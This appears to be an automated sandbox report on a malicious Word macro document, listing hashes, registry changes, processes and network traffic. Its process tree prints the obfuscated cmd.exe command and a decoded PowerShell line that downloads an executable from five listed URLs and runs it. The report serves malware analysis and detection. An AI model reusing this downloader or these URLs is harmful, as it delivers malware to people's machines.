Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
01/05/2024, 12:58 UTC
Behavioral task
behavioral1
Sample
0bdb04d6ade94309db5aa025d012ac7f_JaffaCakes118.doc
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
0bdb04d6ade94309db5aa025d012ac7f_JaffaCakes118.doc
Resource
win10v2004-20240419-en
General
-
Target
0bdb04d6ade94309db5aa025d012ac7f_JaffaCakes118.doc
-
Size
67KB
-
MD5
0bdb04d6ade94309db5aa025d012ac7f
-
SHA1
48302c12594e09eb8abe458523cfe04a9741b62e
-
SHA256
c67d226da6e85679f17b75dc0d668fc59ccacd2503b35e5e18a1d8824a140333
-
SHA512
7f3af4014ee89882bdfc26d2b4b8b35ad76611ff21307d2b2efa55b4822ff876b867957a98d42da893534e339737bfbb694fd3ead7f0f32fe3c25c8ac0ab19da
-
SSDEEP
768:UpJcaUitGAlmrJpmxlzC+w99NBC+1on79royxoJ8v:UptJlmrJpmxlRw99NBC+anep
Malware Config
Extracted
http://develoweb.net/1Fd3
http://bahiacreativa.com/eu
http://atlasbackground.com/f0x
http://adams-moore.com/ep
http://erush.nl/y
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2620 1008 cmd.exe 27 -
Blocklisted process makes network request 11 IoCs
flow pid Process 3 2996 powershell.exe 5 2996 powershell.exe 6 2996 powershell.exe 7 2996 powershell.exe 9 2996 powershell.exe 10 2996 powershell.exe 11 2996 powershell.exe 13 2996 powershell.exe 14 2996 powershell.exe 16 2996 powershell.exe 18 2996 powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\Toolbar WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote WINWORD.EXE Set value (int) \REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell WINWORD.EXE -
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command WINWORD.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command WINWORD.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1008 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2996 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2996 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1008 WINWORD.EXE 1008 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1008 wrote to memory of 2424 1008 WINWORD.EXE 28 PID 1008 wrote to memory of 2424 1008 WINWORD.EXE 28 PID 1008 wrote to memory of 2424 1008 WINWORD.EXE 28 PID 1008 wrote to memory of 2424 1008 WINWORD.EXE 28 PID 1008 wrote to memory of 2620 1008 WINWORD.EXE 29 PID 1008 wrote to memory of 2620 1008 WINWORD.EXE 29 PID 1008 wrote to memory of 2620 1008 WINWORD.EXE 29 PID 1008 wrote to memory of 2620 1008 WINWORD.EXE 29 PID 2620 wrote to memory of 2996 2620 cmd.exe 34 PID 2620 wrote to memory of 2996 2620 cmd.exe 34 PID 2620 wrote to memory of 2996 2620 cmd.exe 34 PID 2620 wrote to memory of 2996 2620 cmd.exe 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0bdb04d6ade94309db5aa025d012ac7f_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1008 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2424
-
-
C:\Windows\SysWOW64\cmd.execmd /V^:O/C"s^e^t ^sN=^ ^ ^ ^ ^ ^ ^ ^}}^{hct^ac}^;^k^a^erb;rVS$^ me^tI^-ek^ovnI;)rVS^$ ^,^PRL^$(^eli^F^da^o^ln^w^oD^.sz^i$^{^yrt^{)Jf^O^$^ n^i^ PR^L$(hc^aer^of^;^'e^x^e.^'+G^sG$+^'\^'^+c^il^b^up^:vn^e^$=rVS$;'522'^ =^ ^Gs^G^$^;)'^@'(^til^p^S^.'^y/ln.^hsur^e//^:^p^tt^h@^p^e/^m^oc.er^oo^m^-s^m^ad^a//:^ptt^h^@x0f/m^oc.dnuorgkca^bs^a^lt^a//^:ptth@^u^e/^m^oc^.^avi^taerca^i^h^ab//^:^pt^t^h^@3^d^F^1/^t^en^.b^ewoleve^d//^:p^t^th^'=^JfO^$^;^tne^ilC^b^e^W^.t^eN^ ^tce^j^bo^-w^en^=^s^zi^$^ l^l^e^hsr^e^w^op&&^f^or /L %c ^in (3^38^;-^1^;0)d^o ^s^e^t 9^w^g=!9^w^g!!^sN:~%c,1!&&^if %c=^=^0 c^a^ll %9^w^g:~-^3^39%"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $izs=new-object Net.WebClient;$OfJ='http://develoweb.net/1Fd3@http://bahiacreativa.com/eu@http://atlasbackground.com/f0x@http://adams-moore.com/ep@http://erush.nl/y'.Split('@');$GsG = '225';$SVr=$env:public+'\'+$GsG+'.exe';foreach($LRP in $OfJ){try{$izs.DownloadFile($LRP, $SVr);Invoke-Item $SVr;break;}catch{}}3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2996
-
-
Network
-
Remote address:8.8.8.8:53Requestdeveloweb.netIN AResponsedeveloweb.netIN A142.4.15.97
-
Remote address:142.4.15.97:80RequestGET /1Fd3 HTTP/1.1
Host: develoweb.net
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Server: Apache
Content-Length: 315
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
-
Remote address:8.8.8.8:53Requestbahiacreativa.comIN AResponsebahiacreativa.comIN A97.74.209.119
-
Remote address:97.74.209.119:80RequestGET /eu HTTP/1.1
Host: bahiacreativa.com
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Server: Apache
Location: https://bahiacreativa.com/eu
Content-Length: 236
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
-
Remote address:8.8.8.8:53Requestatlasbackground.comIN AResponseatlasbackground.comIN A192.185.225.112
-
Remote address:192.185.225.112:80RequestGET /f0x HTTP/1.1
Host: atlasbackground.com
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Server: Apache
Location: https://atlasbackground.com/f0x
Content-Length: 239
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
-
Remote address:8.8.8.8:53Requestadams-moore.comIN AResponseadams-moore.comIN A172.67.178.191adams-moore.comIN A104.21.75.165
-
Remote address:172.67.178.191:80RequestGET /ep HTTP/1.1
Host: adams-moore.com
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Wed, 01 May 2024 13:58:43 GMT
Location: https://adams-moore.com/ep
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MbtnyZ6Yv7iib7FUJCVHaIewUVIBTvMLIRZQSJ27wW2Vwa95wsrMipdD8HUzFfP5JMFV8djBfqm8qxdfrRZUkWi8P1J0%2F1q9GgsIRktDUx7yygEmygL4ZD4PwV09HyGS4LI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87cff1d3dd9d951a-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:172.67.178.191:443RequestGET /ep HTTP/1.1
Host: adams-moore.com
Connection: Keep-Alive
ResponseHTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-edge-cache: cache,platform=wordpress
Cache-Control: no-cache, must-revalidate, max-age=0
Location: https://www.adams-moore.com/ep
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Set-Cookie: X-Mapping-pokiblok=7A2DFF30680F9469349BF891651EC5A1; path=/
X-Redirect-By: WordPress
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vvgEoXNXjTOm2yX7hG72Xpmd4bJn9xWwLI3YGWinLBsQIJAeTupC5Q7CYy9u%2FXcuOpl1vvq%2B56cLqdDm1sXBpY9gUWcSFbmU3QPg%2FyjWPirGoAvCkOY2dHaLp6PvfhkE2Q%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87cff1d52e2f79b9-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Requestwww.adams-moore.comIN AResponsewww.adams-moore.comIN A172.67.178.191www.adams-moore.comIN A104.21.75.165
-
Remote address:172.67.178.191:443RequestGET /ep HTTP/1.1
Host: www.adams-moore.com
Connection: Keep-Alive
ResponseHTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-edge-cache: cache,platform=wordpress
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://www.adams-moore.com/wp-json/>; rel="https://api.w.org/"
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Set-Cookie: X-Mapping-pokiblok=36A6EDA834F42D3A7713A725AB4B4285; path=/
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ijazwvPjmpwozUchVA30Q8uTl1%2BkzQTgQ4uoaHreORbmrYCoDnwHbXiBvQOUWNVkkDE4amz0K5K3YyDT1QIomcsssj9p175Gjs3FbvknQIXcAPbb8CcDycdL8AbEN0uZsiTUDGtd"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 87cff1dcf94a956c-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address:8.8.8.8:53Requesterush.nlIN AResponseerush.nlIN A3.64.163.50
-
Remote address:3.64.163.50:80RequestGET /y HTTP/1.1
Host: erush.nl
Connection: Keep-Alive
ResponseHTTP/1.1 410 Gone
Date: Wed, 01 May 2024 12:58:46 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
-
343 B 688 B 6 4
HTTP Request
GET http://develoweb.net/1Fd3HTTP Response
404 -
299 B 608 B 5 3
HTTP Request
GET http://bahiacreativa.com/euHTTP Response
301 -
397 B 219 B 6 5
-
351 B 219 B 5 5
-
302 B 622 B 5 3
HTTP Request
GET http://atlasbackground.com/f0xHTTP Response
301 -
353 B 219 B 5 5
-
353 B 219 B 5 5
-
349 B 1.8kB 6 4
HTTP Request
GET http://adams-moore.com/epHTTP Response
301 -
756 B 6.0kB 9 9
HTTP Request
GET https://adams-moore.com/epHTTP Response
301 -
1.1kB 22.7kB 16 25
HTTP Request
GET https://www.adams-moore.com/epHTTP Response
404 -
243 B 419 B 4 3
HTTP Request
GET http://erush.nl/yHTTP Response
410
-
59 B 75 B 1 1
DNS Request
develoweb.net
DNS Response
142.4.15.97
-
63 B 79 B 1 1
DNS Request
bahiacreativa.com
DNS Response
97.74.209.119
-
65 B 81 B 1 1
DNS Request
atlasbackground.com
DNS Response
192.185.225.112
-
61 B 93 B 1 1
DNS Request
adams-moore.com
DNS Response
172.67.178.191104.21.75.165
-
65 B 97 B 1 1
DNS Request
www.adams-moore.com
DNS Response
172.67.178.191104.21.75.165
-
54 B 70 B 1 1
DNS Request
erush.nl
DNS Response
3.64.163.50
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
20KB
MD5e3ac2a2e11ef73accd8d22a5de1a3b80
SHA1d5137d9ed6cbe3fb3890f8b31b58743b37477215
SHA2569105b545248baf30de2d7c37002c379a9daf63f3500d178ff978ce4a6c949ea7
SHA5128f72e2193f297054ba7ecb62fd63f2f3d6e7c0e4fb71ab679171a800e3aa602f0989636928d5c3789861a10ef8690cc82b8fdc61a365378ae607f6f874c73c0b